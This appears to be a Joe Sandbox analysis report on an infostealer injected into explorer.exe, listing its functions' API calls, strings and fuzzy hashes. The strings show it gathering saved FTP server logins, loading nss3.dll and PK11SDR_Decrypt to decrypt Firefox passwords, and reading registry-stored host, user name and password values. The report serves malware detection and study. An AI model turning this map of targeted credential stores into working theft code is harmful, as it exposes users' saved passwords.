Opcode Fuzzy Hash: aad30803aeb88ae42a4bfb2f587d4c20816bbfbd60c511302c16261252003607
Instruction Fuzzy Hash: F5012171A01219EB9B15DF9AD888DBFBBBCEF05351B20446AF905D3300D7719E10CBA0

Function 02D61198 Relevance: 3.0, APIs: 2, Instructions: 38encryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(?,?,00000001,00000000,?), ref: 02D611B2

Part of subcall function 02D61000: GetProcessHeap.KERNEL32(00000008,?,02D611C7,?,?,00000001,00000000,?), ref: 02D61003
Part of subcall function 02D61000: RtlAllocateHeap.NTDLL(00000000), ref: 02D6100A

CryptBinaryToStringA.CRYPT32(?,?,00000001,00000000,?,?,?,00000001,00000000,?), ref: 02D611D2

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: BinaryCryptHeapString$AllocateProcess
String ID:
API String ID: 3825993179-0
Opcode ID: cbd3b34726e232a0bcbae78c570417ad9e2c0fad560e0d201dbb2ce4431007e1
Instruction ID: 6d3c20b5fa9e4e5cd7b57341b478e6f61f139766413d111621535579e80400c7
Opcode Fuzzy Hash: cbd3b34726e232a0bcbae78c570417ad9e2c0fad560e0d201dbb2ce4431007e1
Instruction Fuzzy Hash: E7F08232A00119B7D72089979C88DFBBB6DDF856A5B100169F90DD2340DA62DD04C6E0

Function 02D64440 Relevance: 38.8, APIs: 12, Strings: 10, Instructions: 289stringcommemoryCOMMON

Download Yara Rule

APIs

CoCreateInstance.COMBASE(02DB62B0,00000000,00000001,02DB62A0,?), ref: 02D6445F
SysAllocString.OLEAUT32(?), ref: 02D644AA
lstrcmpiW.KERNEL32(RecentServers,?), ref: 02D6456E
lstrcmpiW.KERNEL32(Servers,?), ref: 02D6457D
lstrcmpiW.KERNEL32(Settings,?), ref: 02D6458C

Part of subcall function 02D611E1: lstrlenW.KERNEL32(?,74DEF360,00000000,?,00000000,?,02D646E3), ref: 02D611ED
Part of subcall function 02D611E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 02D6120F
Part of subcall function 02D611E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 02D61231

lstrcmpiW.KERNEL32(Server,?), ref: 02D645BE
lstrcmpiW.KERNEL32(LastServer,?), ref: 02D645CD
lstrcmpiW.KERNEL32(Host,?), ref: 02D64657
lstrcmpiW.KERNEL32(Port,?), ref: 02D64679
lstrcmpiW.KERNEL32(User,?), ref: 02D6469F
lstrcmpiW.KERNEL32(Pass,?), ref: 02D646C5
wsprintfW.USER32 ref: 02D6471E

Strings

LastServer, xrefs: 02D645C8
Server, xrefs: 02D645B9
Servers, xrefs: 02D64578
Port, xrefs: 02D64674
%s:%s, xrefs: 02D64718
Settings, xrefs: 02D64587
Host, xrefs: 02D64652
RecentServers, xrefs: 02D64569
User, xrefs: 02D6469A
Pass, xrefs: 02D646C0

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: lstrcmpi$String$BinaryCrypt$AllocCreateInstancelstrlenwsprintf
String ID: %s:%s$Host$LastServer$Pass$Port$RecentServers$Server$Servers$Settings$User
API String ID: 2230072276-1234691226
Opcode ID: 7840df11732eb8f347a6531cab32c9a12b103ab029c3c86c04caf29bf2d5316c
Instruction ID: e5e601c1eef765d19ccb0a0a826d8f1d9956482a7539c559e8ca73750574b013
Opcode Fuzzy Hash: 7840df11732eb8f347a6531cab32c9a12b103ab029c3c86c04caf29bf2d5316c
Instruction Fuzzy Hash: 8AB1E871204302AFD710DF64C898E6A77F9EF89759F00895CF5558B260DB71ED0ACBA2

Function 02D624B0 Relevance: 35.1, APIs: 11, Strings: 9, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 02D61000: GetProcessHeap.KERNEL32(00000008,?,02D611C7,?,?,00000001,00000000,?), ref: 02D61003
Part of subcall function 02D61000: RtlAllocateHeap.NTDLL(00000000), ref: 02D6100A

Part of subcall function 02D61090: lstrlenW.KERNEL32(?,?,00000000,02D617E5), ref: 02D61097
Part of subcall function 02D61090: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000), ref: 02D610A8

Part of subcall function 02D619B4: lstrlenW.KERNEL32(00000000,00000000,00000000,02D62CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 02D619C4

GetCurrentDirectoryW.KERNEL32(00000104,00000000), ref: 02D62503
SetCurrentDirectoryW.KERNEL32(00000000), ref: 02D6250A
LoadLibraryW.KERNEL32(00000000), ref: 02D62563
SetCurrentDirectoryW.KERNEL32(?), ref: 02D62570
GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 02D62591
GetProcAddress.KERNEL32(00000000,NSS_Shutdown), ref: 02D6259E
GetProcAddress.KERNEL32(00000000,SECITEM_FreeItem), ref: 02D625AB
GetProcAddress.KERNEL32(00000000,PK11_GetInternalKeySlot), ref: 02D625B8
GetProcAddress.KERNEL32(00000000,PK11_Authenticate), ref: 02D625C5
GetProcAddress.KERNEL32(00000000,PK11SDR_Decrypt), ref: 02D625D2
GetProcAddress.KERNEL32(00000000,PK11_FreeSlot), ref: 02D625DF

Part of subcall function 02D6190B: lstrlen.KERNEL32(?,?,?,?,00000000,02D62783), ref: 02D6192B
Part of subcall function 02D6190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,02D62783), ref: 02D61930
Part of subcall function 02D6190B: lstrcat.KERNEL32(00000000,?), ref: 02D61946
Part of subcall function 02D6190B: lstrcat.KERNEL32(00000000,00000000), ref: 02D6194A

Strings

SECITEM_FreeItem, xrefs: 02D625A0
sql:, xrefs: 02D6262B
PK11_FreeSlot, xrefs: 02D625D4
nss3.dll, xrefs: 02D62510
NSS_Shutdown, xrefs: 02D62593
PK11SDR_Decrypt, xrefs: 02D625C7
PK11_Authenticate, xrefs: 02D625BA
NSS_Init, xrefs: 02D6258B
PK11_GetInternalKeySlot, xrefs: 02D625AD

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: AddressProc$lstrlen$CurrentDirectory$Heaplstrcat$AllocateByteCharLibraryLoadMultiProcessWide
String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$SECITEM_FreeItem$nss3.dll$sql:
API String ID: 3366569387-3272982511
Opcode ID: a348a94a7bfdeabf9841a097006defed81e20ba08e53b132b7601c40f017a75b
Instruction ID: 54218966ae3fa33691f64ca0fcccf48f77ae971d7709a1dbd82f859281c09b34
Opcode Fuzzy Hash: a348a94a7bfdeabf9841a097006defed81e20ba08e53b132b7601c40f017a75b
Instruction Fuzzy Hash: 8741F332E40352CB9B15AFB5586C67E3BAADF85741B20452ED88A93381DB74CC05CFA1

Function 02D65E5A Relevance: 23.1, APIs: 6, Strings: 7, Instructions: 382COMMON

Download Yara Rule

APIs

Part of subcall function 02D65BF5: memset.NTDLL ref: 02D65C07

_alldiv.NTDLL(?,?,05265C00,00000000), ref: 02D660E1
_allrem.NTDLL(00000000,?,00000007,00000000), ref: 02D660EC
_alldiv.NTDLL(?,?,000003E8,00000000), ref: 02D66113
_alldiv.NTDLL(?,?,05265C00,00000000), ref: 02D6618E
_alldiv.NTDLL(?,?,05265C00,00000000), ref: 02D661B5
_allrem.NTDLL(00000000,?,00000007,00000000), ref: 02D661C1

Strings

%.16g, xrefs: 02D66077
%03d, xrefs: 02D661F3
%06.3f, xrefs: 02D66229
%lld, xrefs: 02D66122
%02d, xrefs: 02D66039, 02D661D3
W, xrefs: 02D66193
%04d, xrefs: 02D66016

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: _alldiv$_allrem$memset
String ID: %.16g$%02d$%03d$%04d$%06.3f$%lld$W
API String ID: 2557048445-1989508764
Opcode ID: b7e9f290fea29d79714b90e7bb31a387f0793206404513dc47b362048e1b3c62
Instruction ID: c3f613df66bb388c229ded8132ad869299b2e667719bf2d3df6e611b8b0370fb
Opcode Fuzzy Hash: b7e9f290fea29d79714b90e7bb31a387f0793206404513dc47b362048e1b3c62
Instruction Fuzzy Hash: 03B17FB29083429FE7269E24DC8CB3A7BD9EB84348F540659F4C3A63C5EB25DD50CAD1

Function 02D7D2AC Relevance: 19.7, APIs: 1, Strings: 12, Instructions: 169COMMON

Download Yara Rule

APIs

memcmp.NTDLL(02DB637A,BINARY,00000007), ref: 02D7D324

Strings

BINARY, xrefs: 02D7D31E
,%d, xrefs: 02D7D444
(blob), xrefs: 02D7D416
vtab:%p, xrefs: 02D7D423
%.16g, xrefs: 02D7D3E5
%s(%d), xrefs: 02D7D3AB
k(%d, xrefs: 02D7D2EE
%lld, xrefs: 02D7D3CA
(%.20s), xrefs: 02D7D38A
program, xrefs: 02D7D46A
,%s%s, xrefs: 02D7D34E
NULL, xrefs: 02D7D40F

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: memcmp
String ID: %.16g$%lld$%s(%d)$(%.20s)$(blob)$,%d$,%s%s$BINARY$NULL$k(%d$program$vtab:%p
API String ID: 1475443563-3683840195
Opcode ID: a4d755ad9d8962bea98e7588e6ebac1da54eeb043550d237833adfad46c05fc8
Instruction ID: d477967a1cc5398a4cba768548fc33b7e2934640f8e9d7a912747fef915500aa
Opcode Fuzzy Hash: a4d755ad9d8962bea98e7588e6ebac1da54eeb043550d237833adfad46c05fc8
Instruction Fuzzy Hash: 3651BE31504304EBE7269F64D854ABAB7EBEF45604F080969F9D39B340E379EC09CBA1

Function 02D648B1 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 02D619E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02D61AE2,PortNumber,00000000,00000000), ref: 02D61A1E
Part of subcall function 02D619E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02D61A3C
Part of subcall function 02D619E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02D61A75
Part of subcall function 02D619E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02D61AE2,PortNumber,00000000,00000000), ref: 02D61A98

Part of subcall function 02D6482C: lstrlenW.KERNEL32(?), ref: 02D64845
Part of subcall function 02D6482C: lstrlenW.KERNEL32(?), ref: 02D6488F
Part of subcall function 02D6482C: lstrlenW.KERNEL32(?), ref: 02D64897

wsprintfW.USER32 ref: 02D649A7
wsprintfW.USER32 ref: 02D649B9

Strings

UserName, xrefs: 02D648D2
RemoteDirectory, xrefs: 02D648F8
%s:%u/%s, xrefs: 02D64982, 02D649A5
%s:%u, xrefs: 02D64971, 02D649B7
HostName, xrefs: 02D648C4
Password, xrefs: 02D648E4

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: lstrlen$QueryValuewsprintf$CloseOpen
String ID: %s:%u$%s:%u/%s$HostName$Password$RemoteDirectory$UserName
API String ID: 2889301010-4273187114
Opcode ID: 7e7224b00b3c5c50af50f2cb0c3c4826729ef836062dca132854ba80c58c839a
Instruction ID: 1ddfcd11530d6fda0cd4e3c7a755b0b6a3f35b40b90931d6a8b59aa9c0515748
Opcode Fuzzy Hash: 7e7224b00b3c5c50af50f2cb0c3c4826729ef836062dca132854ba80c58c839a
Instruction Fuzzy Hash: 1131C325B44304ABD721AB65C85CA3BB6EEFFC9688F05491EB04597380DBB2DD01CBE1

Function 02D6F92F Relevance: 12.4, APIs: 4, Strings: 4, Instructions: 350COMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,?,?,?,00000000), ref: 02D6FB32
memcpy.NTDLL(?,?,00000000,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 02D6FB4D
memcpy.NTDLL(?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 02D6FB60
memcpy.NTDLL(?,?,?,?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030), ref: 02D6FB95

Strings

nolock, xrefs: 02D6FC4E
-journal, xrefs: 02D6FB6B
-wal, xrefs: 02D6FBA9
immutable, xrefs: 02D6FC68

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: memcpy
String ID: -journal$-wal$immutable$nolock
API String ID: 3510742995-3408036318
Opcode ID: 21ce98e435554394c029aeb949552d843c61c808d6d40c5fda223c9889892bf1
Instruction ID: 54df0d9d45de06693eb137e14c5a6af7d7a04475611f41607847cfc2d98dbc6f
Opcode Fuzzy Hash: 21ce98e435554394c029aeb949552d843c61c808d6d40c5fda223c9889892bf1
Instruction Fuzzy Hash: F6D1C1B16087418FDB14DF28D894B2ABBE6EF85314F08496DE89A8B391D775DC04CF62

Function 02D67820 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 407COMMON

Download Yara Rule

Strings

-x0, xrefs: 02D67325
%, xrefs: 02D67822
NaN, xrefs: 02D673F8

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID:
String ID: %$-x0$NaN
API String ID: 0-62881354
Opcode ID: 214fb30ea590f14b1ef3fdfb16a80956d1a240a240694aab552d856456be1306
Instruction ID: 40df8844949c7ad0f244b454806472d9c63672894bdc3bfaca4d1d8f5e161048
Opcode Fuzzy Hash: 214fb30ea590f14b1ef3fdfb16a80956d1a240a240694aab552d856456be1306
Instruction Fuzzy Hash: 34D1E530A0C3868FE7258E28849877AFBE5EF8960CF18595EF8D187351D764CD45CB92

Function 02D678B0 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 441COMMON

Download Yara Rule

Strings

-x0, xrefs: 02D67325
NaN, xrefs: 02D673F8

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID:
String ID: -x0$NaN
API String ID: 0-3447725786
Opcode ID: 1ee5180015ef30e22dd080857427ab623be1ee3aabd67d972d80abd53f44cce8
Instruction ID: 77d8b4ef1e576b99bbe880218529b1791f5b1b77a2b5fc5ef2140a9e43ccde1f
Opcode Fuzzy Hash: 1ee5180015ef30e22dd080857427ab623be1ee3aabd67d972d80abd53f44cce8
Instruction Fuzzy Hash: D7E10530A0C3868FE7258E28845877AFBE5EF8960CF18595EE8D287391D764CD45CB92

Function 02D67A5C Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 431COMMON

Download Yara Rule

Strings

-x0, xrefs: 02D67325
NaN, xrefs: 02D673F8

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID:
String ID: -x0$NaN
API String ID: 0-3447725786
Opcode ID: 6304b45cf29003389b9ed779c3fae96e3e5a824e923a7d82fbb22767b7278e5f
Instruction ID: d62118d31ad26b23de147989868881a563be24bc564db2fbadc7f8c16418b14e
Opcode Fuzzy Hash: 6304b45cf29003389b9ed779c3fae96e3e5a824e923a7d82fbb22767b7278e5f
Instruction Fuzzy Hash: EDE1E230A083868FE725CE28849877AFBE5EF8960CF18595EF8D187391D764CD45CB92

Function 02D67A28 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 426COMMON

Download Yara Rule

Strings

-x0, xrefs: 02D67325
NaN, xrefs: 02D673F8

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID:
String ID: -x0$NaN
API String ID: 0-3447725786
Opcode ID: 2c3e6436d76f52d0219d881dc0867032b304c61c67fb68bb0fc5a72ccd297eec
Instruction ID: 7ef8a3ab07dfb54dad2fdaa810fbfa0426b06f635b1c67d2bd60c742b87adef1
Opcode Fuzzy Hash: 2c3e6436d76f52d0219d881dc0867032b304c61c67fb68bb0fc5a72ccd297eec
Instruction Fuzzy Hash: 44E1E430A083868FE7258E28849877AFBE5EF8920CF18595EF8D187351D765CD45CB92

Function 02D677F9 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 414COMMON

Download Yara Rule

Strings

-x0, xrefs: 02D67325
NaN, xrefs: 02D673F8

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID:
String ID: -x0$NaN
API String ID: 0-3447725786
Opcode ID: 089fa2599dfadab5237ae1600b2a457447cab0383046bdab823bbd24935cb25c
Instruction ID: 8eaa7cbe692fe238faef5dd9b1f1897276f7c0025e86296edfff0d9971350662
Opcode Fuzzy Hash: 089fa2599dfadab5237ae1600b2a457447cab0383046bdab823bbd24935cb25c
Instruction Fuzzy Hash: C7E1D370A0C3868FE7258E28849877AFBE5EF8920CF18595EF8D187391D764CD45CB92

Function 02D670C9 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 403COMMON

Download Yara Rule

APIs

_aulldvrm.NTDLL(00000000,00000002,0000000A,00000000), ref: 02D6720E
_aullrem.NTDLL(00000000,?,0000000A,00000000), ref: 02D67226
_aulldvrm.NTDLL(00000000,00000000,?), ref: 02D6727B

Strings

-x0, xrefs: 02D67325
NaN, xrefs: 02D673F8

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: _aulldvrm$_aullrem
String ID: -x0$NaN
API String ID: 105165338-3447725786
Opcode ID: a902b191c2abdb5d6f4e9c6fb1d22b477999668780b9e0ad532564c067b277d3
Instruction ID: d97f3e8f63e5be5445535cddefa49802f0cb549529f2bcfdc4578fb11034bdbc
Opcode Fuzzy Hash: a902b191c2abdb5d6f4e9c6fb1d22b477999668780b9e0ad532564c067b277d3
Instruction Fuzzy Hash: 07D1D530A0C3868FE7258E28849877AFBE5EF8960CF18595DF8D187351D764CD45CB92

Function 02D6898F Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 353COMMON

Download Yara Rule

APIs

_allmul.NTDLL(00000000,?,0000000A,00000000), ref: 02D68AAD
_allmul.NTDLL(?,?,0000000A,00000000), ref: 02D68B66
_allmul.NTDLL(?,00000000,0000000A,00000000), ref: 02D68C9B
_alldvrm.NTDLL(?,00000000,0000000A,00000000), ref: 02D68CAE

Strings

., xrefs: 02D68B17

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: _allmul$_alldvrm
String ID: .
API String ID: 115548886-248832578
Opcode ID: d5011df6beca27dfadc471677b6a8d5869c9d84db192c60af475272eaa218cdf
Instruction ID: f41cb9656232b844aa7efccbf4cfb94f19995583d7d6cfc231739f4d0583f01e
Opcode Fuzzy Hash: d5011df6beca27dfadc471677b6a8d5869c9d84db192c60af475272eaa218cdf
Instruction Fuzzy Hash: 35D1BBB194D7858BC7209F18888833ABBE2FF95315F05095EFAC5D6380D3B18D49DB96

Function 02D8D684 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 79COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 02D8D6A0
memset.NTDLL ref: 02D8D6B3
memset.NTDLL ref: 02D8D6C3

Strings

,, xrefs: 02D8D6FC
7, xrefs: 02D8D71B
9, xrefs: 02D8D701

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: memset
String ID: ,$7$9
API String ID: 2221118986-1653249994
Opcode ID: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
Instruction ID: 9557b5e6128560438bf7b7cc537480243c74872805a13733ba7feb71872abdce
Opcode Fuzzy Hash: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
Instruction Fuzzy Hash: CF316A715083449FD335DF64D840B8BBBE9EF85340F00892EE98A97291EB719949CBA2

Function 02D61BC5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000,00000000,?,02D62E75,PathToExe,00000000,00000000), ref: 02D61BCC
StrStrIW.SHLWAPI(00000000,.exe,?,02D62E75,PathToExe,00000000,00000000), ref: 02D61BF0
StrRChrIW.SHLWAPI(00000000,00000000,0000005C,?,02D62E75,PathToExe,00000000,00000000), ref: 02D61C05
lstrlenW.KERNEL32(00000000,?,02D62E75,PathToExe,00000000,00000000), ref: 02D61C1C

Strings

.exe, xrefs: 02D61BEA

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: lstrlen
String ID: .exe
API String ID: 1659193697-4119554291
Opcode ID: 7ab0469e01b943f8eece9f9de63053fa80840d1a9ff217819b2404226fc57255
Instruction ID: e0df76df8643fafdf37e3d9612ece3eadc0e10efbaf9c4786e5de6e51da747ec
Opcode Fuzzy Hash: 7ab0469e01b943f8eece9f9de63053fa80840d1a9ff217819b2404226fc57255
Instruction Fuzzy Hash: 77F0C231B50221DBE3256F39AC99BBFA3A9EF01341B25582AE14AC3350FB60CC51C799

Function 02D72FF6 Relevance: 6.6, APIs: 5, Instructions: 369COMMON

Download Yara Rule

APIs

_allmul.NTDLL(?,00000000,00000018), ref: 02D7316F
_allmul.NTDLL(-00000001,00000000,?,?), ref: 02D731D2
_alldiv.NTDLL(?,?,00000000), ref: 02D732DE
_allmul.NTDLL(00000000,?,00000000), ref: 02D732E7
_allmul.NTDLL(?,00000000,?,?), ref: 02D73392

Part of subcall function 02D716CD: memset.NTDLL ref: 02D7172B

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: _allmul$_alldivmemset
String ID:
API String ID: 3880648599-0
Opcode ID: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
Instruction ID: c7d28feaaeafc17725ac17cb7f867031ecf1ecfef23ee78697f10f2378d9abe3
Opcode Fuzzy Hash: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
Instruction Fuzzy Hash: 79D197706083418BDB64DF29C480B6ABBE6EFC8708F14896DF99597350EB78DC45CB92

Function 02D987FA Relevance: 6.4, APIs: 1, Strings: 3, Instructions: 388COMMON

Download Yara Rule

Strings

new, xrefs: 02D988AA
FOREIGN KEY constraint failed, xrefs: 02D98AC8
old, xrefs: 02D9889E

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID:
String ID: FOREIGN KEY constraint failed$new$old
API String ID: 0-384346570
Opcode ID: a28c4fddf4640393eed6f070d870e31f1622d588b77cff961b09226d5b8e8493
Instruction ID: 6ccd01ea092a8bc147a4713787eab1d2aa21705d699c3989f58fd3e26c7e4c5f
Opcode Fuzzy Hash: a28c4fddf4640393eed6f070d870e31f1622d588b77cff961b09226d5b8e8493
Instruction Fuzzy Hash: 95D109706083009FDB14EF259490B2EBBEAEB89B54F10491EF985CB390DB74DD45DBA2

Function 02D696BC Relevance: 6.4, APIs: 5, Instructions: 105COMMON

Download Yara Rule

APIs

_alldiv.NTDLL(000000FF,7FFFFFFF,?,?), ref: 02D696E7
_alldiv.NTDLL(00000000,80000000,?,?), ref: 02D69707
_alldiv.NTDLL(00000000,80000000,?,?), ref: 02D69739
_alldiv.NTDLL(00000001,80000000,?,?), ref: 02D6976C
_allmul.NTDLL(?,?,?,?), ref: 02D69798

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: _alldiv$_allmul
String ID:
API String ID: 4215241517-0
Opcode ID: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
Instruction ID: 0679724a9b96fe5aac4916505b8b687baf5cd3c0e287c63055ef2027c91ef0c2
Opcode Fuzzy Hash: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
Instruction Fuzzy Hash: 942123311083D56BD7349DA64CFCBFB76DACBA07A8F24092EE81193340EA728C00C5B1

Function 02D7B162 Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

_allmul.NTDLL(?,00000000,00000000), ref: 02D7B1B3
_alldvrm.NTDLL(?,?,00000000), ref: 02D7B20F
_allrem.NTDLL(?,00000000,?,?), ref: 02D7B28A
memcpy.NTDLL(?,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,00000000), ref: 02D7B298

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: _alldvrm_allmul_allremmemcpy
String ID:
API String ID: 1484705121-0
Opcode ID: fc60035512ca94d53564a0d59e4791914b8abd2c805dc3b46d8ae6f105a9118d
Instruction ID: e6ae23e1eb7ff894df64059dc8d6c624d6de61394757a4a51b327e335614a001
Opcode Fuzzy Hash: fc60035512ca94d53564a0d59e4791914b8abd2c805dc3b46d8ae6f105a9118d
Instruction Fuzzy Hash: C44126756093019FC714EF25C89092ABBE6EFD8304F44892EF99597351EB34EC05CB62

Function 02D61895 Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

GetHGlobalFromStream.COMBASE(?,?), ref: 02D618A7
GlobalLock.KERNEL32(02D64B57), ref: 02D618B6
GlobalUnlock.KERNEL32(?), ref: 02D618F4

Part of subcall function 02D61000: GetProcessHeap.KERNEL32(00000008,?,02D611C7,?,?,00000001,00000000,?), ref: 02D61003
Part of subcall function 02D61000: RtlAllocateHeap.NTDLL(00000000), ref: 02D6100A

RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 02D618E8

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: Global$Heap$AllocateFromLockMemoryMoveProcessStreamUnlock
String ID:
API String ID: 1688112647-0
Opcode ID: 1d3eea9df1619cdd271a2b2d1df021bb0a3f61517507efa93dfa952533cfb9c3
Instruction ID: f8dce51793aa98740257042fae55fc35153818ad79a339dacf44439f9dae4131
Opcode Fuzzy Hash: 1d3eea9df1619cdd271a2b2d1df021bb0a3f61517507efa93dfa952533cfb9c3
Instruction Fuzzy Hash: 74016276644346EF9B025F75985C96F7BAEEF84291B10842EF559C3310DF31CD14DA60

Function 02D61953 Relevance: 6.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00000000,00000000,?,?,02D62F0C), ref: 02D61973
